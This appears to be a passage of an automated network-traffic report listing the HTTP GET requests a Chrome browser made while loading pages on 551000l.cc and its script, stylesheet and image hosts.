Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/layer.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/float.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/1/3B/E2/0973C37817A5D1570D2AED02D91_1A4F1A29_14F98C.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/theme/default/layer.css?v=3.1.0 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/CometMarathon.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.super-marquee.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.nicescroll.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/moment.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/lazyload.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/gui-base.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/bootstrap-dialog.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/layer.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/F/3A/FA/D3291F0B28550FCE05C6FD5AA87_291DC08D_1634EF4.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/static/js/gb.validation.min.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.super-marquee.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.nicescroll.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/moment.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/static/js/gb.validation.min.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1u4o7di1tomcmk44o12rs8g624
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index/getAppsUrl.html?device=android&fPixelId=&accessToken=&apiVersion= HTTP/1.1Host: 551000l.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /errors/605.html HTTP/1.1Host: 551000l.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: route=31b5452c7ebd24ef97de659f4fb68f7c
Source: global trafficHTTP traffic detected: GET /live.html HTTP/1.1Host: 551000l.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: route=31b5452c7ebd24ef97de659f4fb68f7c
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/default/common.css?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/default/lang/zh_CN.css?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/error.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/base.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/base.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/default/bootstrap/bootstrap.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/default/bootstrap-dialog/bootstrap-dialog.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/default/font-awesome/font-awesome.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/default/style.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/default/content.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/default/login.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/images/errors/ico-605.png HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/main.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
